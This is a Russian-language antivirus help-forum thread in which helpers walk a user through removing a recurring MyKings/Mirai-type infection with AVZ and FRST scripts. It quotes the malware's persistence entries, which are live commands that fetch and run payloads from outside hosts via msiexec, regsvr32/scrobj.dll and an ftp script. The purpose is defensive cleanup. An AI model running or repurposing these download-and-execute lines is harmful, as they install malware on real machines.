Eternal Опубликовано 4 мая, 2017 Опубликовано 4 мая, 2017 Добрый день. Компьютер заражен вирусом Backdoor.Win32.Mirai.a. Антивирус Касперский удаляет его, но после перезагрузки вирус появляется снова. Также в шедулере появляются два задания, первое запускает - my1.bat, второе - msinfo.exe. Самостоятельно удалить не получилось, прошу помощи. CollectionLog-2017.05.04-14.22.zip
SQ Опубликовано 4 мая, 2017 Опубликовано 4 мая, 2017 Здравствуйте,Что из следующего Вам знакомо? O4 - Global User Startup: bginfo.vbs O4 - HKLM\..\Run: [rundll32] cmd /c if exist c:\windows\debug\item.dat start rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa O4 - HKLM\..\Run: [start1] msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q O4 - HKLM\..\Run: [start] regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll O4 - HKU\S-1-5-21-4173327269-1302852069-987730624-292894\..\Run: [audiodg] c:\programdata\audiodg.exe (User 'Pavel.Zhilnikov') AVZ выполнить следующий скрипт.Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора. begin StopService('MpsSvcc'); StopService('Windowscurryus'); DeleteService('MpsSvcc'); QuarantineFile('C:\WINDOWS\SysWOW64\srvany.exe',''); QuarantineFile('C:\Windows\Help\svch0st.exe',''); QuarantineFileF('C:\Windows\Help', '*.exe,*.dll,*.sys,*.pif', false,'', 0, 0); QuarantineFile('C:\Windows\debug\Moner\Systmms.exe',''); QuarantineFileF('C:\Windows\debug\Moner', '*.exe,*.dll,*.sys,*.pif', false,'', 0, 0); QuarantineFile('c:\programdata\audiodg.exe',''); QuarantineFile('c:\windows\debug\item.dat',''); DeleteFile('C:\Windows\Help\svch0st.exe','32'); DeleteFile('c:\programdata\audiodg.exe','32'); RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','rundll32'); RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start'); RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start1'); RegKeyParamDel('HKEY_USERS','S-1-5-21-4173327269-1302852069-987730624-292894\Software\Microsoft\Windows\CurrentVersion\Run','audiodg'); BC_ImportAll; ExecuteSysClean; BC_Activate; end. После выполнения скрипта перезагрузите сервер вручную.После перезагрузки:- Выполните в AVZ: begin CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); end. quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com.1. В заголовке письма напишите "Запрос на исследование вредоносного файла".2. В письме напишите "Выполняется запрос хэлпера".3. Прикрепите файл карантина и нажмите "Отправить"4. Полученный ответ сообщите здесь (с указанием номера KLAN)- Подготовьте лог AdwCleaner и приложите его в теме.
Eternal Опубликовано 5 мая, 2017 Автор Опубликовано 5 мая, 2017 [KLAN-6192970763] Благодарим за обращение в Антивирусную Лабораторию Присланные вами файлы и ссылки были проверены в автоматическом режиме В антивирусных базах информация по присланным вами файлам отсутствует: audiodg.exe Перечисленные файлы имеют безопасный формат и не могут быть вредоносными: image001.jpg AdwCleanerS0.txt
regist Опубликовано 5 мая, 2017 Опубликовано 5 мая, 2017 Что из следующего Вам знакомо?не ответили. 2
Eternal Опубликовано 5 мая, 2017 Автор Опубликовано 5 мая, 2017 O4 - Global User Startup: bginfo.vbsO4 - HKLM\..\Run: [rundll32] cmd /c if exist c:\windows\debug\item.dat start rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaaO4 - HKLM\..\Run: [start1] msiexec.exe /i http://js.mykings.top:280/helloworld.msi /qO4 - HKLM\..\Run: [start] regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dllO4 - HKU\S-1-5-21-4173327269-1302852069-987730624-292894\..\Run: [audiodg] c:\programdata\audiodg.exe (User 'Pavel.Zhilnikov') Знаком только первый файл, остальные не мои.
SQ Опубликовано 5 мая, 2017 Опубликовано 5 мая, 2017 - Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением. Убедитесь, что в окне Optional Scan отмечены "List BCD" и "Driver MD5". Нажмите кнопку Scan. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении. Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.
Eternal Опубликовано 5 мая, 2017 Автор Опубликовано 5 мая, 2017 скан сделал, отчеты прилагаю FRST.txt Addition.txt
SQ Опубликовано 5 мая, 2017 Опубликовано 5 мая, 2017 Знакома ли Вам? [Net Windows] => c:\Newra.exe Похоже, что виновник пользователь: C:\Users\Lenara Закройте и сохраните все открытые приложения. Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool: CreateRestorePoint: File: c:\Newra.exe Zip: c:\Newra.exe HKU\S-1-5-21-3793589222-921306656-2052304484-1439\...\Run: [Net Windows] => c:\Newra.exe File: C:\Windows\debug\Moner\Systmms.exe Folder: C:\Windows\debug\Moner File: C:\WINDOWS\SysWOW64\srvany.exe Task: {50AFD522-0E2D-4CD6-BC4E-2BD879EAE6DA} - System32\Tasks\Mysa => cmd /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении! Обратите внимание, что сервер возможно будет перезагружен. После выполнения фикса на рабочем столе образуется архив (<дата>_<время>.zip) отправьте карантин на newvirus@kaspersky.com.
Eternal Опубликовано 5 мая, 2017 Автор Опубликовано 5 мая, 2017 KLAN-6197087774 Благодарим за обращение в Антивирусную Лабораторию Присланные вами файлы и ссылки были проверены в автоматическом режиме В антивирусных базах информация по присланным вами файлам отсутствует: 05.05.2017_15.59.03.zip Перечисленные файлы имеют безопасный формат и не могут быть вредоносными: image001.jpg p.s. вирус снова себя проявил, в папке windows\debug появляются файлы item.dat и PASSWD.LOG, в процессах появляется Rundll.exe cо строкой ServiceMain aaaa
SQ Опубликовано 5 мая, 2017 Опубликовано 5 мая, 2017 Необходим Fixlog.txt после выполнения предыдущего фикса.
regist Опубликовано 6 мая, 2017 Опубликовано 6 мая, 2017 + пожалуйста, Скачайте Universal Virus Sniffer (uVS) Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем". Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе. !!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip , то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную. Дождитесь окончания работы программы и прикрепите лог к посту в теме. !!! Обратите внимание , что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора , при необходимости укажите пароль администратора и нажмите "Да" . Подробнее читайте в руководстве Как подготовить лог UVS. 1
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти